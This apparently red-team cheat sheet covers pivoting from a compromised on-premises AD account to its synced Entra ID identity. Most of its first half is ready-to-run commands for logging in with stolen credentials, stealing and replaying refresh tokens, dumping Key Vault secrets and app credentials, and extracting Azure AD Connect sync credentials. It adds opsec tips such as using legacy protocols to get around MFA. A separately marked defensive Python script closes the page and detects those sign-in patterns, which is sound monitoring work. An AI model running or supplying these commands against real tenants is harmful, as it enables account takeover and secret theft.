SyncedToEntraUser

An on-premises AD user is synchronized to an Entra ID (Azure AD) account via Azure AD Connect. Compromising the on-prem account grants access to the cloud identity.

Applies to: User (on-prem AD) → User (Entra ID)


Linux Abuse

Authenticate to Azure with on-prem creds (Azure CLI)

az login -u '<username>@<domain>' -p '<password>'
az account show
az ad signed-in-user show

Authenticate with access token (ROADtools / TokenTactics)

# Get token via ROADlib
roadrecon auth -u '<username>@<domain>' -p '<password>'
roadrecon gather
roadrecon gui

TokenTactics: get token

# PowerShell via pwsh on Linux
Import-Module ./TokenTactics.psd1   # module manifest shipped with TokenTactics
Get-AzureToken -Client MSGraph

GraphRunner: enumerate with token

# After obtaining access token:
Invoke-GraphRunner -Tokens $tokens

Azure CLI: enumerate roles and resources

az role assignment list --all --assignee '<object-id>'
az group list
az vm list
az keyvault list
az storage account list

Dump Azure AD secrets (if GA or privileged role)

az ad app list --all
az ad sp credential list --id <app-id>
az keyvault secret list --vault-name <vault-name>
az keyvault secret show --vault-name <vault-name> --name <secret-name>

AADInternals: read Azure info (pwsh)

pwsh -c "Import-Module AADInternals; Get-AADIntAccessTokenForMSGraph -Credentials (Get-Credential) | Read-AADIntAccesstoken"

Windows Abuse

Connect to Azure AD (AzureAD module)

Import-Module AzureAD
$cred = Get-Credential  # use <username>@<domain> UPN
Connect-AzureAD -Credential $cred
Get-AzureADUser -ObjectId '<username>@<domain>'
Get-AzureADDirectoryRole | Get-AzureADDirectoryRoleMember

Connect with Az module

Import-Module Az
Connect-AzAccount -Credential $cred
Get-AzRoleAssignment
Get-AzResource
Get-AzVM

Enumerate group memberships

Get-AzureADUserMembership -ObjectId '<object-id>'

Dump app credentials (if privileged)

Get-AzureADApplication | ForEach-Object {
    Get-AzureADApplicationPasswordCredential -ObjectId $_.ObjectId
}

Azure AD Connect: extract sync account creds (on AAD Connect server, requires SYSTEM or AAD Connect admin)

# AADInternals
Import-Module AADInternals
Get-AADIntSyncCredentials

Pass-the-token (refresh token reuse)

Import-Module ./TokenTactics.psd1   # module manifest shipped with TokenTactics
$tokens = Get-AzureToken -Client MSGraph
Invoke-RefreshToMSGraphToken -refreshToken $tokens.refresh_token -tenantid <tenant-id>

Opsec

  • Azure sign-in logs capture every authentication with IP, device, location
  • Legacy protocol auth (Basic Auth to Exchange, SMTP) bypasses Conditional Access; try if MFA is enforced
  • Refresh tokens are long-lived (up to 90 days); stealing the refresh token is more durable than the password
  • Azure AD Connect MSOL sync account has DCSync rights on-prem; compromising the AAD Connect server is a direct path to DCSync
  • Check for Password Hash Sync (PHS) vs Pass-through Auth (PTA) vs Federation; this affects which attacks work
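Defensive counterpart to the Opsec notes above, added here and not part of the original page: a triage pass over constructed Entra ID sign-in records (a subset of the Microsoft Graph signIn fields) that flags successful legacy-protocol sign-ins that skipped Conditional Access and MFA, and the Azure AD Connect connector (Sync_*) account signing in from anywhere but its assumed server egress IP KNOWN_SYNC_IP.

```python
"""Triage constructed Entra ID sign-in records for the Opsec risks above.
Assumptions (not from the page): records use a subset of the Microsoft Graph
signIn schema; the AAD Connect server's egress IP is KNOWN_SYNC_IP."""
import json

# Legacy clientAppUsed values: Conditional Access cannot demand MFA for these.
LEGACY_CLIENTS = {"Exchange ActiveSync", "IMAP4", "POP3", "SMTP",
                  "Authenticated SMTP", "Other clients"}
KNOWN_SYNC_IP = "203.0.113.10"  # assumed egress IP of the AAD Connect server

# Constructed sample sign-in records (JSON lines); not real tenant data.
SAMPLE_LOG = """\
{"userPrincipalName":"jdoe@corp.example","clientAppUsed":"Browser","conditionalAccessStatus":"success","authenticationRequirement":"multiFactorAuthentication","ipAddress":"198.51.100.5","status":{"errorCode":0}}
{"userPrincipalName":"jdoe@corp.example","clientAppUsed":"IMAP4","conditionalAccessStatus":"notApplied","authenticationRequirement":"singleFactorAuthentication","ipAddress":"192.0.2.77","status":{"errorCode":0}}
{"userPrincipalName":"Sync_SRV01_abc123@corp.onmicrosoft.com","clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"notApplied","authenticationRequirement":"singleFactorAuthentication","ipAddress":"203.0.113.10","status":{"errorCode":0}}
{"userPrincipalName":"Sync_SRV01_abc123@corp.onmicrosoft.com","clientAppUsed":"Mobile Apps and Desktop clients","conditionalAccessStatus":"notApplied","authenticationRequirement":"singleFactorAuthentication","ipAddress":"192.0.2.77","status":{"errorCode":0}}
{"userPrincipalName":"jdoe@corp.example","clientAppUsed":"SMTP","conditionalAccessStatus":"notApplied","authenticationRequirement":"singleFactorAuthentication","ipAddress":"192.0.2.77","status":{"errorCode":50126}}
"""


def triage(jsonl: str, sync_ip: str = KNOWN_SYNC_IP) -> list[dict]:
    """Return findings, each with the rule name, UPN and source IP."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        upn, ip = rec["userPrincipalName"], rec["ipAddress"]
        ok = rec.get("status", {}).get("errorCode", 0) == 0  # only successes
        # Rule 1: legacy protocol sign-in that CA never evaluated, single factor.
        if (ok and rec.get("clientAppUsed") in LEGACY_CLIENTS
                and rec.get("conditionalAccessStatus") == "notApplied"
                and rec.get("authenticationRequirement") == "singleFactorAuthentication"):
            findings.append({"rule": "legacy-auth-bypass", "upn": upn, "ip": ip})
        # Rule 2: connector account used off the AAD Connect server suggests
        # its credentials were dumped (see Get-AADIntSyncCredentials above).
        if ok and upn.startswith("Sync_") and ip != sync_ip:
            findings.append({"rule": "sync-account-offhost", "upn": upn, "ip": ip})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['rule']:22} {f['upn']:45} {f['ip']}")
```

The failed SMTP attempt (errorCode 50126) is skipped on purpose; a separate rule counting failures per source IP would cover spraying, which this block does not attempt.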